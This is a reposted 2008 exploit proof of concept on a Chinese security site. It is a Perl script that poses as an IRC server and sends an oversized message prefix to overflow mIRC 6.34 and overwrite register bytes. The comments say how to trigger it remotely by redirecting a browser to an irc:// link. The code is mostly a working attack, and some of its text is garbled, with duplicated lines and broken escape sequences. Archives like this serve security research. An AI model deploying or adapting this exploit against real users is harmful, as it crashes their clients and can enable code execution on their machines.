mIRC 6.34 Remote Buffer Overflow PoC 's

admin
admin
admin
139475
文章
114
评论
2017年4月26日05:41:51评论267 views字数 725阅读2分25秒阅读模式
摘要

########################################################
# Mirc 6.34 Remote Buffer Overflow
#
# This poc allow you to own the 2 first EDI & EDX bytes.
#
# To become remote, add a simple document.location.href=irc://server.com/… in some html page
#
use IO::Socket;

sub sock()
{
my $sock=new IO::Socket::INET (
Listen => 1,

########################################################
# Mirc 6.34 Remote Buffer Overflow
#
# This poc allow you to own the 2 first EDI & EDX bytes.
#
# To become remote, add a simple document.location.href=irc://server.com/… in some html page
#
use IO::Socket;

sub sock()
{
my $sock=new IO::Socket::INET (
Listen => 1,

LocalAddr => ‘localhost’,

LocalPort => 6667,

Proto => ‘tcp’); die unless $sock;

print ” [+]IRC Server started on port 6667 /r/n”;

$s=$sock->accept();
$a = “A” x 313;
$twobytes = “/x43/x43″;

print ” [+]Sending pickles/r/n”;

print $s “:irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow/r/n”;
sleep(1);
print $s “:”.$a.$twobytes.” PRIVMSG yow : /FINGER yow./r/n”;
}
while(1)
{
sock();
print ” [+]Mirc should be down now, another little friend comming ?/r/n [+]Server Restarting/r/n”;
}

# milw0rm.com [2008-10-02]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月26日05:41:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   mIRC 6.34 Remote Buffer Overflow PoC 'shttps://cn-sec.com/archives/45597.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息